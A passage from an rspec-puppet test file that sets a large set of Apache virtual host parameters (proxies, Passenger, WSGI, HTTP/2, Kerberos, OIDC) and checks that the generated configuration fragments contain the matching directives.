'log_level' => 'crit',
'access_log' => false,
'access_log_file' => 'httpd_access_log',
'access_log_syslog' => true,
'access_log_format' => '%h %l %u %t \"%r\" %>s %b',
'access_log_env_var' => '',
'aliases' => '/image',
'directories' => [
{
'path' => '/var/www/files',
'provider' => 'files',
'require' => ['valid-user', 'all denied'],
},
{
'path' => '/var/www/files',
'provider' => 'files',
'additional_includes' => ['/custom/path/includes', '/custom/path/another_includes'],
},
{
'path' => '/var/www/files',
'provider' => 'files',
'require' => 'all granted',
},
{
'path' => '/var/www/files',
'provider' => 'files',
'require' =>
{
'enforce' => 'all',
'requires' => ['all-valid1', 'all-valid2'],
},
},
{
'path' => '/var/www/files',
'provider' => 'files',
'require' =>
{
'enforce' => 'none',
'requires' => ['none-valid1', 'none-valid2'],
},
},
{
'path' => '/var/www/files',
'provider' => 'files',
'require' =>
{
'enforce' => 'any',
'requires' => ['any-valid1', 'any-valid2'],
},
},
{
'path' => '*',
'provider' => 'proxy',
},
{ 'path' => '/var/www/files/indexed_directory',
'directoryindex' => 'disabled',
'options' => ['Indexes', 'FollowSymLinks', 'MultiViews'],
'index_options' => ['FancyIndexing'],
'index_style_sheet' => '/styles/style.css' },
{ 'path' => '/var/www/files/output_filtered',
'set_output_filter' => 'output_filter' },
{ 'path' => '/var/www/files/input_filtered',
'set_input_filter' => 'input_filter' },
{ 'path' => '/var/www/files',
'provider' => 'location',
'limit' => [
{ 'methods' => 'GET HEAD',
'require' => ['valid-user'] },
] },
{ 'path' => '/var/www/files',
'provider' => 'location',
'limit_except' => [
{ 'methods' => 'GET HEAD',
'require' => ['valid-user'] },
] },
{ 'path' => '/var/www/dav',
'dav' => 'filesystem',
'dav_depth_infinity' => true,
'dav_min_timeout' => '600' },
{
'path' => '/var/www/http2',
'h2_copy_files' => true,
'h2_push_resource' => [
'/foo.css',
'/foo.js',
],
},
{
'path' => '/',
'provider' => 'location',
'auth_ldap_referrals' => 'off',
},
{
'path' => '/proxy',
'provider' => 'location',
'proxy_pass' => [
{
'url' => 'http://backend-b/',
'keywords' => ['noquery', 'interpolate'],
'params' => {
'retry' => '0',
'timeout' => '5',
},
},
],
},
{
'path' => '/var/www/node-app/public',
'passenger_enabled' => true,
'passenger_base_uri' => '/app',
'passenger_ruby' => '/path/to/ruby',
'passenger_python' => '/path/to/python',
'passenger_nodejs' => '/path/to/nodejs',
'passenger_meteor_app_settings' => '/path/to/file.json',
'passenger_app_env' => 'demo',
'passenger_app_root' => '/var/www/node-app',
'passenger_app_group_name' => 'foo_bar',
'passenger_app_start_command' => 'start-command',
'passenger_app_type' => 'node',
'passenger_startup_file' => 'start.js',
'passenger_restart_dir' => 'temp',
'passenger_load_shell_envvars' => false,
'passenger_rolling_restarts' => false,
'passenger_resist_deployment_errors' => false,
'passenger_user' => 'nodeuser',
'passenger_group' => 'nodegroup',
'passenger_friendly_error_pages' => true,
'passenger_min_instances' => 7,
'passenger_max_instances' => 9,
'passenger_force_max_concurrent_requests_per_process' => 12,
'passenger_start_timeout' => 10,
'passenger_concurrency_model' => 'thread',
'passenger_thread_count' => 20,
'passenger_max_requests' => 2000,
'passenger_max_request_time' => 1,
'passenger_memory_limit' => 32,
'passenger_high_performance' => false,
'passenger_buffer_upload' => false,
'passenger_buffer_response' => false,
'passenger_error_override' => false,
'passenger_max_request_queue_size' => 120,
'passenger_max_request_queue_time' => 5,
'passenger_sticky_sessions' => true,
'passenger_sticky_sessions_cookie_name' => '_delicious_cookie',
'passenger_sticky_sessions_cookie_attributes' => 'SameSite=Lax; Secure;',
'passenger_allow_encoded_slashes' => false,
'passenger_app_log_file' => '/tmp/app.log',
'passenger_debugger' => false,
},
],
'error_log' => false,
'error_log_file' => 'httpd_error_log',
'error_log_syslog' => true,
'error_log_format' => ['[%t] [%l] %7F: %E: [client\ %a] %M% ,\ referer\ %{Referer}i'],
'error_documents' => 'true',
'fallbackresource' => '/index.php',
'scriptalias' => '/usr/lib/cgi-bin',
'scriptaliases' => [
{
'alias' => '/myscript',
'path' => '/usr/share/myscript',
},
{
'aliasmatch' => '^/foo(.*)',
'path' => '/usr/share/fooscripts$1',
},
],
'limitreqfieldsize' => 8190,
'limitreqfields' => 100,
'limitreqline' => 8190,
'limitreqbody' => 0,
'proxy_dest' => '/',
'proxy_pass' => [
{
'path' => '/a',
'url' => 'http://backend-a/',
'keywords' => ['noquery', 'interpolate'],
'no_proxy_uris' => ['/a/foo', '/a/bar'],
'no_proxy_uris_match' => ['/a/foomatch'],
'reverse_cookies' => [
{
'path' => '/a',
'url' => 'http://backend-a/',
},
{
'domain' => 'foo',
'url' => 'http://foo',
},
],
'params' => {
'retry' => '0',
'timeout' => '5',
},
'setenv' => ['proxy-nokeepalive 1', 'force-proxy-request-1.0 1'],
},
],
'proxy_pass_match' => [
{
'path' => '/a',
'url' => 'http://backend-a/',
'keywords' => ['noquery', 'interpolate'],
'no_proxy_uris' => ['/a/foo', '/a/bar'],
'no_proxy_uris_match' => ['/a/foomatch'],
'params' => {
'retry' => '0',
'timeout' => '5',
},
'setenv' => ['proxy-nokeepalive 1', 'force-proxy-request-1.0 1'],
},
],
'proxy_requests' => false,
'suphp_addhandler' => 'foo',
'suphp_engine' => 'on',
'suphp_configpath' => '/var/www/html',
'php_admin_flags' => ['foo', 'bar'],
'php_admin_values' => ['true', 'false'],
'no_proxy_uris' => '/foo',
'no_proxy_uris_match' => '/foomatch',
'proxy_preserve_host' => true,
'proxy_add_headers' => true,
'proxy_error_override' => true,
'redirect_source' => '/bar',
'redirect_dest' => '/',
'redirect_status' => 'temp',
'redirectmatch_status' => ['404'],
'redirectmatch_regexp' => ['\.git$'],
'redirectmatch_dest' => ['http://www.example.com'],
'headers' => 'Set X-Robots-Tag "noindex, noarchive, nosnippet"',
'request_headers' => ['append MirrorID "mirror 12"'],
'rewrites' => [
{
'rewrite_rule' => ['^index\.html$ welcome.html'],
},
],
'filters' => [
'FilterDeclare COMPRESS',
'FilterProvider COMPRESS DEFLATE resp=Content-Type $text/html',
'FilterProvider COMPRESS DEFLATE resp=Content-Type $text/css',
'FilterProvider COMPRESS DEFLATE resp=Content-Type $text/plain',
'FilterProvider COMPRESS DEFLATE resp=Content-Type $text/xml',
'FilterChain COMPRESS',
'FilterProtocol COMPRESS DEFLATE change=yes;byteranges=no',
],
'rewrite_base' => '/',
'rewrite_rule' => '^index\.html$ welcome.html',
'rewrite_cond' => '%{HTTP_USER_AGENT} ^MSIE',
'rewrite_inherit' => true,
'setenv' => ['FOO=/bin/true'],
'setenvif' => 'Request_URI "\.gif$" object_is_image=gif',
'setenvifnocase' => 'REMOTE_ADDR ^127.0.0.1 localhost=true',
'block' => 'scm',
'wsgi_application_group' => '%{GLOBAL}',
'wsgi_daemon_process' => { 'foo' => { 'python-home' => '/usr' }, 'bar' => {} },
'wsgi_daemon_process_options' => {
'processes' => '2',
'threads' => '15',
'display-name' => '%{GROUP}',
},
'wsgi_import_script' => '/var/www/demo.wsgi',
'wsgi_import_script_options' => {
'process-group' => 'wsgi',
'application-group' => '%{GLOBAL}',
},
'wsgi_process_group' => 'wsgi',
'wsgi_script_aliases' => {
'/' => '/var/www/demo.wsgi',
},
'wsgi_script_aliases_match' => {
'^/test/(^[/*)' => '/var/www/demo.wsgi',
},
'wsgi_pass_authorization' => 'On',
'custom_fragment' => '#custom string',
'itk' => {
'user' => 'someuser',
'group' => 'somegroup',
},
'wsgi_chunked_request' => 'On',
'action' => 'foo',
'fastcgi_server' => 'localhost',
'fastcgi_socket' => '/tmp/fastcgi.socket',
'fastcgi_dir' => '/tmp',
'fastcgi_idle_timeout' => '120',
'additional_includes' => '/custom/path/includes',
'apache_version' => '2.4',
'use_optional_includes' => true,
'suexec_user_group' => 'root root',
'allow_encoded_slashes' => 'nodecode',
'use_canonical_name' => 'dns',
'h2_copy_files' => false,
'h2_direct' => true,
'h2_early_hints' => false,
'h2_max_session_streams' => 100,
'h2_modern_tls_only' => true,
'h2_push' => true,
'h2_push_diary_size' => 256,
'h2_push_priority' => [
'application/json 32',
],
'h2_push_resource' => [
'/css/main.css',
'/js/main.js',
],
'h2_serialize_headers' => false,
'h2_stream_max_mem_size' => 65_536,
'h2_tls_cool_down_secs' => 1,
'h2_tls_warm_up_size' => 1_048_576,
'h2_upgrade' => true,
'h2_window_size' => 65_535,
'passenger_enabled' => false,
'passenger_base_uri' => '/app',
'passenger_ruby' => '/usr/bin/ruby1.9.1',
'passenger_python' => '/usr/local/bin/python',
'passenger_nodejs' => '/usr/bin/node',
'passenger_meteor_app_settings' => '/path/to/some/file.json',
'passenger_app_env' => 'test',
'passenger_app_root' => '/usr/share/myapp',
'passenger_app_group_name' => 'app_customer',
'passenger_app_start_command' => 'start-my-app',
'passenger_app_type' => 'rack',
'passenger_startup_file' => 'bin/www',
'passenger_restart_dir' => 'tmp',
'passenger_spawn_method' => 'direct',
'passenger_load_shell_envvars' => false,
'passenger_rolling_restarts' => false,
'passenger_resist_deployment_errors' => true,
'passenger_user' => 'sandbox',
'passenger_group' => 'sandbox',
'passenger_friendly_error_pages' => false,
'passenger_min_instances' => 1,
'passenger_max_instances' => 30,
'passenger_max_preloader_idle_time' => 600,
'passenger_force_max_concurrent_requests_per_process' => 10,
'passenger_start_timeout' => 600,
'passenger_concurrency_model' => 'thread',
'passenger_thread_count' => 5,
'passenger_max_requests' => 1000,
'passenger_max_request_time' => 2,
'passenger_memory_limit' => 64,
'passenger_stat_throttle_rate' => 5,
'passenger_pre_start' => 'http://localhost/myapp',
'passenger_high_performance' => true,
'passenger_buffer_upload' => false,
'passenger_buffer_response' => false,
'passenger_error_override' => true,
'passenger_max_request_queue_size' => 10,
'passenger_max_request_queue_time' => 2,
'passenger_sticky_sessions' => true,
'passenger_sticky_sessions_cookie_name' => '_nom_nom_nom',
'passenger_sticky_sessions_cookie_attributes' => 'Nom=nom; Secure;',
'passenger_allow_encoded_slashes' => true,
'passenger_app_log_file' => '/app/log/file',
'passenger_debugger' => true,
'passenger_lve_min_uid' => 500,
'add_default_charset' => 'UTF-8',
'jk_mounts' => [
{ 'mount' => '/*', 'worker' => 'tcnode1' },
{ 'unmount' => '/*.jpg', 'worker' => 'tcnode1' },
],
'auth_kerb' => true,
'krb_method_negotiate' => 'off',
'krb_method_k5passwd' => 'off',
'krb_authoritative' => 'off',
'krb_auth_realms' => ['EXAMPLE.ORG', 'EXAMPLE.NET'],
'krb_5keytab' => '/tmp/keytab5',
'krb_local_user_mapping' => 'off',
'http_protocol_options' => 'Strict LenientMethods Allow0.9',
'keepalive' => 'on',
'keepalive_timeout' => '100',
'max_keepalive_requests' => '1000',
'protocols' => ['h2', 'http/1.1'],
'protocols_honor_order' => true,
'auth_oidc' => true,
'oidc_settings' => { 'ProviderMetadataURL' => 'https://login.example.com/.well-known/openid-configuration',
'ClientID' => 'test',
'RedirectURI' => 'https://login.example.com/redirect_uri',
'ProviderTokenEndpointAuth' => 'client_secret_basic',
'RemoteUserClaim' => 'sub',
'ClientSecret' => 'aae053a9-4abf-4824-8956-e94b2af335c8',
'CryptoPassphrase' => '4ad1bb46-9979-450e-ae58-c696967df3cd' },
}
end
it { is_expected.to compile }
it { is_expected.not_to contain_file('/var/www/foo') }
it { is_expected.to contain_class('apache::mod::ssl') }
it {
is_expected.to contain_file('ssl.conf').with(
content: %r{^\s+SSLHonorCipherOrder On$},
)
}
it {
is_expected.to contain_file('ssl.conf').with(
content: %r{^\s+SSLPassPhraseDialog builtin$},
)
}
it {
is_expected.to contain_file('ssl.conf').with(
content: %r{^\s+SSLSessionCacheTimeout 300$},
)
}
it { is_expected.to contain_class('apache::mod::mime') }
it { is_expected.to contain_class('apache::mod::vhost_alias') }
it { is_expected.to contain_class('apache::mod::wsgi') }
it { is_expected.to contain_class('apache::mod::suexec') }
it { is_expected.to contain_class('apache::mod::passenger') }
it {
is_expected.to contain_file('/var/www/logs').with('ensure' => 'directory',
'mode' => '0600')
}
it { is_expected.to contain_class('apache::mod::rewrite') }
it { is_expected.to contain_class('apache::mod::alias') }
it { is_expected.to contain_class('apache::mod::proxy') }
it { is_expected.to contain_class('apache::mod::proxy_http') }
it { is_expected.to contain_class('apache::mod::fastcgi') }
it { is_expected.to contain_class('apache::mod::headers') }
it { is_expected.to contain_class('apache::mod::filter') }
it { is_expected.to contain_class('apache::mod::env') }
it { is_expected.to contain_class('apache::mod::setenvif') }
it {
is_expected.to contain_concat('30-rspec.example.com.conf').with('owner' => 'root',
'mode' => '0644',
'require' => 'Package[httpd]',
'notify' => 'Class[Apache::Service]')
}
if facts[:os]['release']['major'].to_i >= 18 && facts[:os]['name'] == 'Ubuntu'
it {
is_expected.to contain_file('30-rspec.example.com.conf symlink').with('ensure' => 'link',
'path' => "/etc/#{apache_name}/sites-enabled/30-rspec.example.com.conf")
}
end
it { is_expected.to contain_concat__fragment('rspec.example.com-apache-header') }
it {
is_expected.to contain_concat__fragment('rspec.example.com-apache-header').with(
content: %r{^\s+LimitRequestFieldSize 8190$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-apache-header').with(
content: %r{^\s+LimitRequestFields 100$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-apache-header').with(
content: %r{^\s+LimitRequestLine 8190$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-apache-header').with(
content: %r{^\s+LimitRequestBody 0$},
)
}
it { is_expected.to contain_concat__fragment('rspec.example.com-docroot') }
it { is_expected.to contain_concat__fragment('rspec.example.com-aliases') }
it { is_expected.to contain_concat__fragment('rspec.example.com-itk') }
it { is_expected.to contain_concat__fragment('rspec.example.com-fallbackresource') }
it { is_expected.to contain_concat__fragment('rspec.example.com-directories') }
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+<Proxy "\*">$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Include\s'\/custom\/path\/includes'$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Include\s'\/custom\/path\/another_includes'$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+H2CopyFiles\sOn$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+H2PushResource\s/foo.css$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+H2PushResource\s/foo.js$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Require valid-user$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Require all denied$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Require all granted$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+<RequireAll>$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+<\/RequireAll>$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Require all-valid1$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Require all-valid2$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+<RequireNone>$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+<\/RequireNone>$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Require none-valid1$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Require none-valid2$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+<RequireAny>$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+<\/RequireAny>$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Require any-valid1$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Require any-valid2$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+LDAPReferrals off$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+ProxyPass http://backend-b/ retry=0 timeout=5 noquery interpolate$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Options\sIndexes\sFollowSymLinks\sMultiViews$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+IndexOptions\sFancyIndexing$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+IndexStyleSheet\s'\/styles\/style\.css'$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+DirectoryIndex\sdisabled$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+SetOutputFilter\soutput_filter$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+SetInputFilter\sinput_filter$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+<Limit GET HEAD>$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{\s+<Limit GET HEAD>\s*Require valid-user\s*<\/Limit>}m,
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+<LimitExcept GET HEAD>$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{\s+<LimitExcept GET HEAD>\s*Require valid-user\s*<\/LimitExcept>}m,
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Dav\sfilesystem$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+DavDepthInfinity\sOn$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+DavMinTimeout\s600$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerEnabled\sOn$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerBaseURI\s/app$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerRuby\s/path/to/ruby$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerPython\s/path/to/python$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerNodejs\s/path/to/nodejs$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerMeteorAppSettings\s/path/to/file\.json$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerAppEnv\sdemo$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerAppRoot\s/var/www/node-app$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerAppGroupName\sfoo_bar$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerAppType\snode$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerStartupFile\sstart\.js$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerRestartDir\stemp$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerLoadShellEnvvars\sOff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerRollingRestarts\sOff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerResistDeploymentErrors\sOff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerUser\snodeuser$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerGroup\snodegroup$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerFriendlyErrorPages\sOn$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerMinInstances\s7$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerMaxInstances\s9$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerForceMaxConcurrentRequestsPerProcess\s12$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerStartTimeout\s10$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerConcurrencyModel\sthread$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerThreadCount\s20$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerMaxRequests\s2000$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerMaxRequestTime\s1$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerMemoryLimit\s32$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerHighPerformance\sOff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerBufferUpload\sOff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerBufferResponse\sOff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerErrorOverride\sOff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerMaxRequestQueueSize\s120$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerMaxRequestQueueTime\s5$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerStickySessions\sOn$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerStickySessionsCookieName\s_delicious_cookie$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerAllowEncodedSlashes\sOff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerDebugger\sOff$},
)
}
it { is_expected.to contain_concat__fragment('rspec.example.com-additional_includes') }
it { is_expected.to contain_concat__fragment('rspec.example.com-logging') }
it {
is_expected.to contain_concat__fragment('rspec.example.com-logging')
.with_content(%r{^\s+ErrorLogFormat "\[%t\] \[%l\] %7F: %E: \[client\\ %a\] %M% ,\\ referer\\ %\{Referer\}i"$})
}
it { is_expected.to contain_concat__fragment('rspec.example.com-serversignature') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-access_log') }
it { is_expected.to contain_concat__fragment('rspec.example.com-action') }
it { is_expected.to contain_concat__fragment('rspec.example.com-block') }
it { is_expected.to contain_concat__fragment('rspec.example.com-error_document') }
it {
is_expected.to contain_concat__fragment('rspec.example.com-proxy').with_content(
%r{retry=0},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-proxy').with_content(
%r{timeout=5},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-proxy').with_content(
%r{SetEnv force-proxy-request-1.0 1},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-proxy').with_content(
%r{SetEnv proxy-nokeepalive 1},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-proxy').with_content(
%r{noquery interpolate},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-proxy').with_content(
%r{ProxyPreserveHost On},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-proxy').with_content(
%r{ProxyAddHeaders On},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-proxy').with_content(
%r{ProxyPassReverseCookiePath\s+\/a\s+http:\/\/},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-proxy').with_content(
%r{ProxyPassReverseCookieDomain\s+foo\s+http:\/\/foo},
)
}
it { is_expected.to contain_concat__fragment('rspec.example.com-redirect') }
it { is_expected.to contain_concat__fragment('rspec.example.com-rewrite') }
it {
is_expected.to contain_concat__fragment('rspec.example.com-rewrite').with(
content: %r{^\s+RewriteOptions Inherit$},
)
}
it { is_expected.to contain_concat__fragment('rspec.example.com-scriptalias') }
it { is_expected.to contain_concat__fragment('rspec.example.com-serveralias') }
it {
is_expected.to contain_concat__fragment('rspec.example.com-setenv').with_content(
%r{SetEnv FOO=/bin/true},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-setenv').with_content(
%r{SetEnvIf Request_URI "\\.gif\$" object_is_image=gif},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-setenv').with_content(
%r{SetEnvIfNoCase REMOTE_ADDR \^127.0.0.1 localhost=true},
)
}
it { is_expected.to contain_concat__fragment('rspec.example.com-ssl') }
it {
is_expected.to contain_concat__fragment('rspec.example.com-ssl').with(
content: %r{^\s+SSLOpenSSLConfCmd\s+DHParameters "foo.pem"$},
)
}
it { is_expected.to contain_concat__fragment('rspec.example.com-sslproxy') }
it {
is_expected.to contain_concat__fragment('rspec.example.com-sslproxy').with(
content: %r{^\s+SSLProxyEngine On$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-sslproxy').with(
content: %r{^\s+SSLProxyCheckPeerCN\s+on$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-sslproxy').with(
content: %r{^\s+SSLProxyCheckPeerName\s+on$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-sslproxy').with(
content: %r{^\s+SSLProxyCheckPeerExpire\s+on$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-sslproxy').with(
content: %r{^\s+SSLProxyCipherSuite\s+HIGH$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-sslproxy').with(
content: %r{^\s+SSLProxyProtocol\s+TLSv1.2$},
)
}
it { is_expected.to contain_concat__fragment('rspec.example.com-suphp') }
it { is_expected.to contain_concat__fragment('rspec.example.com-php_admin') }
it { is_expected.to contain_concat__fragment('rspec.example.com-header') }
it {
is_expected.to contain_concat__fragment('rspec.example.com-filters').with(
content: %r{^\s+FilterDeclare COMPRESS$},
)
}
it { is_expected.to contain_concat__fragment('rspec.example.com-requestheader') }
it { is_expected.to contain_concat__fragment('rspec.example.com-wsgi') }
it { is_expected.to contain_concat__fragment('rspec.example.com-custom_fragment') }
it { is_expected.to contain_concat__fragment('rspec.example.com-fastcgi') }
it { is_expected.to contain_concat__fragment('rspec.example.com-suexec') }
it { is_expected.to contain_concat__fragment('rspec.example.com-allow_encoded_slashes') }
it { is_expected.to contain_concat__fragment('rspec.example.com-passenger') }
it { is_expected.to contain_concat__fragment('rspec.example.com-charsets') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-security') }
it { is_expected.to contain_concat__fragment('rspec.example.com-file_footer') }
it {
is_expected.to contain_concat__fragment('rspec.example.com-jk_mounts').with(
content: %r{^\s+JkMount\s+\/\*\s+tcnode1$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-jk_mounts').with(
content: %r{^\s+JkUnMount\s+\/\*\.jpg\s+tcnode1$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-auth_kerb').with(
content: %r{^\s+KrbMethodNegotiate\soff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-auth_kerb').with(
content: %r{^\s+KrbAuthoritative\soff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-auth_kerb').with(
content: %r{^\s+KrbAuthRealms\sEXAMPLE.ORG\sEXAMPLE.NET$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-auth_kerb').with(
content: %r{^\s+Krb5Keytab\s\/tmp\/keytab5$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-auth_kerb').with(
content: %r{^\s+KrbLocalUserMapping\soff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-auth_kerb').with(
content: %r{^\s+KrbServiceName\sHTTP$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-auth_kerb').with(
content: %r{^\s+KrbSaveCredentials\soff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-auth_kerb').with(
content: %r{^\s+KrbVerifyKDC\son$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-http_protocol_options').with(
content: %r{^\s*HttpProtocolOptions\s+Strict\s+LenientMethods\s+Allow0\.9$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-keepalive_options').with(
content: %r{^\s+KeepAlive\son$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-keepalive_options').with(
content: %r{^\s+KeepAliveTimeout\s100$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-keepalive_options').with(
content: %r{^\s+MaxKeepAliveRequests\s1000$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-apache-header').with(
content: %r{^\s+Protocols\sh2 http/1.1$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-apache-header').with(
content: %r{^\s+ProtocolsHonorOrder\sOn$},
)
}
it {
